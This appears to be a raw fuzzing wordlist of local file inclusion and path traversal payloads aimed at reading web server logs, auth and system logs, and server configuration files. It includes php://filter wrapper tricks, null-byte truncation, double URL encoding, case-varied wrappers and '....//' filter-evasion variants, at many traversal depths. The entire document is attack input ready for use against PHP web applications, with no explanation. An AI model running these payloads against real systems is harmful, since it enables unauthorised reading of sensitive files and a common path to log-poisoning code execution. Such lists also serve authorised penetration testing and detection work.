/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/error_log
../var/log/apache2/access.log
../var/log/apache2/error.log
../../var/log/apache2/access.log
../../var/log/apache2/error.log
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../../var/log/apache2/access.log
../../../../var/log/apache2/error.log
../../../../../var/log/apache2/access.log
../../../../../var/log/apache2/error.log
../../../../../../var/log/apache2/access.log
../../../../../../var/log/apache2/error.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/access.log
/var/log/httpd/error.log
../var/log/httpd/access_log
../var/log/httpd/error_log
../../var/log/httpd/access_log
../../var/log/httpd/error_log
../../../var/log/httpd/access_log
../../../var/log/httpd/error_log
../../../../var/log/httpd/access_log
../../../../var/log/httpd/error_log
../../../../../var/log/httpd/access_log
../../../../../var/log/httpd/error_log
../../../../../../var/log/httpd/access_log
../../../../../../var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
../var/log/nginx/access.log
../var/log/nginx/error.log
../../var/log/nginx/access.log
../../var/log/nginx/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../../var/log/nginx/access.log
../../../../var/log/nginx/error.log
../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/error.log
../../../../../../var/log/nginx/access.log
../../../../../../var/log/nginx/error.log
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
../var/log/lighttpd/access.log
../var/log/lighttpd/error.log
../../var/log/lighttpd/access.log
../../var/log/lighttpd/error.log
../../../var/log/lighttpd/access.log
../../../var/log/lighttpd/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
../usr/local/apache/logs/access_log
../../usr/local/apache/logs/access_log
../../../usr/local/apache/logs/access_log
../../../../usr/local/apache/logs/access_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error_log
../usr/local/apache2/logs/access_log
../../usr/local/apache2/logs/access_log
../../../usr/local/apache2/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error.log
../opt/lampp/logs/access_log
../../opt/lampp/logs/access_log
../../../opt/lampp/logs/access_log
../../../../opt/lampp/logs/access_log
/Applications/XAMPP/logs/access_log
/Applications/XAMPP/logs/error_log
../Applications/XAMPP/logs/access_log
../../Applications/XAMPP/logs/access_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
../var/www/logs/access_log
../../var/www/logs/access_log
../../../var/www/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error.log
../etc/httpd/logs/access_log
../../etc/httpd/logs/access_log
../../../etc/httpd/logs/access_log
/var/log/apache/access_log
/var/log/apache/error_log
/var/log/apache/access.log
/var/log/apache/error.log
../var/log/apache/access_log
../../var/log/apache/access_log
../../../var/log/apache/access_log
../../../../var/log/apache/access_log
/var/log/httpd-access.log
/var/log/httpd-error.log
../var/log/httpd-access.log
../../var/log/httpd-access.log
../../../var/log/httpd-access.log
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_error_log
../var/log/httpd/ssl_access_log
../../var/log/httpd/ssl_access_log
/var/log/apache2/ssl_access.log
/var/log/apache2/ssl_error.log
../var/log/apache2/ssl_access.log
../../var/log/apache2/ssl_access.log
/var/log/apache2/other_vhosts_access.log
../var/log/apache2/other_vhosts_access.log
../../var/log/apache2/other_vhosts_access.log
php://filter/convert.base64-encode/resource=/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/var/log/apache2/error.log
php://filter/convert.base64-encode/resource=../var/log/apache2/access.log
php://filter/convert.base64-encode/resource=../../var/log/apache2/access.log
php://filter/convert.base64-encode/resource=../../../var/log/apache2/access.log
php://filter/convert.base64-encode/resource=../../../../var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/var/log/httpd/access_log
php://filter/convert.base64-encode/resource=/var/log/httpd/error_log
php://filter/convert.base64-encode/resource=../var/log/httpd/access_log
php://filter/convert.base64-encode/resource=../../var/log/httpd/access_log
php://filter/convert.base64-encode/resource=../../../var/log/httpd/access_log
php://filter/convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/convert.base64-encode/resource=/var/log/nginx/error.log
php://filter/convert.base64-encode/resource=../var/log/nginx/access.log
php://filter/convert.base64-encode/resource=../../var/log/nginx/access.log
php://filter/convert.base64-encode/resource=../../../var/log/nginx/access.log
php://filter/string.rot13/resource=/var/log/apache2/access.log
php://filter/string.rot13/resource=/var/log/apache2/error.log
php://filter/string.rot13/resource=../var/log/apache2/access.log
php://filter/string.rot13/resource=../../var/log/apache2/access.log
php://filter/string.rot13/resource=/var/log/httpd/access_log
php://filter/string.rot13/resource=../var/log/httpd/access_log
php://filter/string.rot13/resource=/var/log/nginx/access.log
php://filter/string.rot13/resource=../var/log/nginx/access.log
/var/log/apache2/access.log%00
/var/log/apache2/error.log%00
../var/log/apache2/access.log%00
../../var/log/apache2/access.log%00
/var/log/httpd/access_log%00
/var/log/httpd/error_log%00
../var/log/httpd/access_log%00
../../var/log/httpd/access_log%00
/var/log/nginx/access.log%00
/var/log/nginx/error.log%00
../var/log/nginx/access.log%00
../../var/log/nginx/access.log%00
%2e%2e/var/log/apache2/access.log
%2e%2e/%2e%2e/var/log/apache2/access.log
%2e%2e/%2e%2e/%2e%2e/var/log/apache2/access.log
%2e%2e/var/log/httpd/access_log
%2e%2e/%2e%2e/var/log/httpd/access_log
%2e%2e/%2e%2e/%2e%2e/var/log/httpd/access_log
%2e%2e/var/log/nginx/access.log
%2e%2e/%2e%2e/var/log/nginx/access.log
%2e%2e/%2e%2e/%2e%2e/var/log/nginx/access.log
%252e%252e/var/log/apache2/access.log
%252e%252e/%252e%252e/var/log/apache2/access.log
%252e%252e/var/log/httpd/access_log
%252e%252e/%252e%252e/var/log/httpd/access_log
%252e%252e/var/log/nginx/access.log
%252e%252e/%252e%252e/var/log/nginx/access.log
/usr/local/nginx/logs/access.log
/usr/local/nginx/logs/error.log
../usr/local/nginx/logs/access.log
../../usr/local/nginx/logs/access.log
../../../usr/local/nginx/logs/access.log
/var/log/lsws/access.log
/var/log/lsws/error.log
../var/log/lsws/access.log
../../var/log/lsws/access.log
../../../var/log/lsws/access.log
/usr/local/lsws/logs/access.log
/usr/local/lsws/logs/error.log
../usr/local/lsws/logs/access.log
../../usr/local/lsws/logs/access.log
/var/log/openresty/access.log
/var/log/openresty/error.log
../var/log/openresty/access.log
../../var/log/openresty/access.log
/var/log/access.log
/var/log/error.log
../var/log/access.log
../../var/log/access.log
../../../var/log/access.log
../../../../var/log/access.log
/var/log/access_log
/var/log/error_log
../var/log/access_log
../../var/log/access_log
../../../var/log/access_log
/logs/access.log
/logs/error.log
../logs/access.log
../../logs/access.log
../../../logs/access.log
/apache/logs/access.log
/apache/logs/error.log
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
/apache2/logs/access.log
/apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/access.log
/nginx/logs/access.log
/nginx/logs/error.log
../nginx/logs/access.log
../../nginx/logs/access.log
/var/log/apache2/access.log.1
/var/log/apache2/error.log.1
../var/log/apache2/access.log.1
../../var/log/apache2/access.log.1
/var/log/httpd/access_log.1
/var/log/httpd/error_log.1
../var/log/httpd/access_log.1
../../var/log/httpd/access_log.1
/var/log/nginx/access.log.1
/var/log/nginx/error.log.1
../var/log/nginx/access.log.1
../../var/log/nginx/access.log.1
file:///var/log/apache2/access.log
file://../var/log/apache2/access.log
file://../../var/log/apache2/access.log
file:///var/log/httpd/access_log
file://../var/log/httpd/access_log
file://../../var/log/httpd/access_log
file:///var/log/nginx/access.log
file://../var/log/nginx/access.log
file://../../var/log/nginx/access.log
..//var/log/apache2/access.log
..//..//var/log/apache2/access.log
..//var/log/httpd/access_log
..//..//var/log/httpd/access_log
..//var/log/nginx/access.log
..//..//var/log/nginx/access.log
....//var/log/apache2/access.log
....//....//var/log/apache2/access.log
....//var/log/httpd/access_log
....//....//var/log/httpd/access_log
/var/log/apache2/access.log.bak
/var/log/apache2/access.log.old
/var/log/apache2/access.log.save
../var/log/apache2/access.log.bak
../../var/log/apache2/access.log.bak
/var/log/httpd/access_log.bak
/var/log/httpd/access_log.old
../var/log/httpd/access_log.bak
../../var/log/httpd/access_log.bak
/var/log/nginx/access.log.bak
/var/log/nginx/access.log.old
../var/log/nginx/access.log.bak
../../var/log/nginx/access.log.bak
pHp://filter/convert.base64-encode/resource=/var/log/apache2/access.log
PHP://filter/convert.base64-encode/resource=/var/log/apache2/access.log
pHp://filter/convert.base64-encode/resource=/var/log/httpd/access_log
pHp://filter/convert.base64-encode/resource=/var/log/nginx/access.log
%70%68%70://filter/convert.base64-encode/resource=/var/log/apache2/access.log
%70%68%70://filter/convert.base64-encode/resource=/var/log/httpd/access_log
%70%68%70://filter/convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/read=convert.base64-encode/resource=/var/log/apache2/access.log
php://filter/read=convert.base64-encode/resource=../var/log/apache2/access.log
php://filter/read=convert.base64-encode/resource=/var/log/httpd/access_log
php://filter/read=convert.base64-encode/resource=../var/log/httpd/access_log
php://filter/read=convert.base64-encode/resource=/var/log/nginx/access.log
php://filter/read=convert.base64-encode/resource=../var/log/nginx/access.log
php://filter/convert.iconv.utf-8.utf-16/resource=/var/log/apache2/access.log
php://filter/convert.iconv.utf-8.utf-16/resource=/var/log/httpd/access_log
php://filter/convert.iconv.utf-8.utf-16/resource=/var/log/nginx/access.log
php://filter/zlib.deflate/resource=/var/log/apache2/access.log
php://filter/zlib.deflate/resource=/var/log/httpd/access_log
php://filter/zlib.deflate/resource=/var/log/nginx/access.log
/var/log/apache2/../apache2/access.log
../../var/log/apache2/../apache2/access.log
/var/log/httpd/../httpd/access_log
../../var/log/httpd/../httpd/access_log
/var/log/./apache2/access.log
/var/log/././apache2/access.log
/var/log/./httpd/access_log
/var/log/./nginx/access.log
var/log/apache2/access.log
var/log/httpd/access_log
var/log/nginx/access.log
./var/log/apache2/access.log
./var/log/httpd/access_log
./var/log/nginx/access.log
././var/log/apache2/access.log
././var/log/httpd/access_log
././var/log/nginx/access.log
/var/log/apache2/access.log.
/var/log/apache2/access.log....
../var/log/apache2/access.log.
/var/log/httpd/access_log.
/var/log/httpd/access_log....
../var/log/httpd/access_log.
/var/log/nginx/access.log.
/var/log/nginx/access.log....
../var/log/nginx/access.log.
/var/log/apache2/access.log/
../var/log/apache2/access.log/
/var/log/httpd/access_log/
../var/log/httpd/access_log/
/var/log/nginx/access.log/
../var/log/nginx/access.log/
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\wamp\logs\apache_access.log
C:\wamp\logs\apache_error.log
C:\Program Files\Apache Group\Apache2\logs\access.log
C:\Program Files\Apache Group\Apache2\logs\error.log
C:\inetpub\logs\LogFiles\W3SVC1\access.log
/var/log/vsftpd.log
../var/log/vsftpd.log
../../var/log/vsftpd.log
/var/log/proftpd/proftpd.log
../var/log/proftpd/proftpd.log
../../var/log/proftpd/proftpd.log
/var/log/auth.log
../var/log/auth.log
../../var/log/auth.log
../../../var/log/auth.log
/var/log/secure
../var/log/secure
../../var/log/secure
../../../var/log/secure
/var/log/syslog
../var/log/syslog
../../var/log/syslog
../../../var/log/syslog
/var/log/messages
../var/log/messages
../../var/log/messages
../../../var/log/messages
/var/log/mail.log
../var/log/mail.log
../../var/log/mail.log
php://filter/string.rot13|string.rot13/resource=/var/log/apache2/access.log
php://filter/string.rot13|string.rot13/resource=/var/log/httpd/access_log
php://filter/string.rot13|string.rot13/resource=/var/log/nginx/access.log
php://filter/convert.base64-encode|convert.base64-decode/resource=/var/log/apache2/access.log
php://filter/convert.base64-encode|convert.base64-decode/resource=/var/log/httpd/access_log
php://filter/convert.base64-encode|convert.base64-decode/resource=/var/log/nginx/access.log
/usr/local/apache/conf/httpd.conf
../usr/local/apache/conf/httpd.conf
../../usr/local/apache/conf/httpd.conf
/etc/apache2/apache2.conf
../etc/apache2/apache2.conf
../../etc/apache2/apache2.conf
/etc/httpd/conf/httpd.conf
../etc/httpd/conf/httpd.conf
../../etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
../etc/nginx/nginx.conf
../../etc/nginx/nginx.conf
